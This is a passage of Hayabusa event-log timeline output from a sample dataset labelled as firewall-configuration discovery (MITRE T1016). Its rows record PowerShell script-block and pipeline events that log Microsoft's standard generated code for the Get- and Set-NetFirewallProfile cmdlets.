'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" 
ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 
Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdleti",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh 
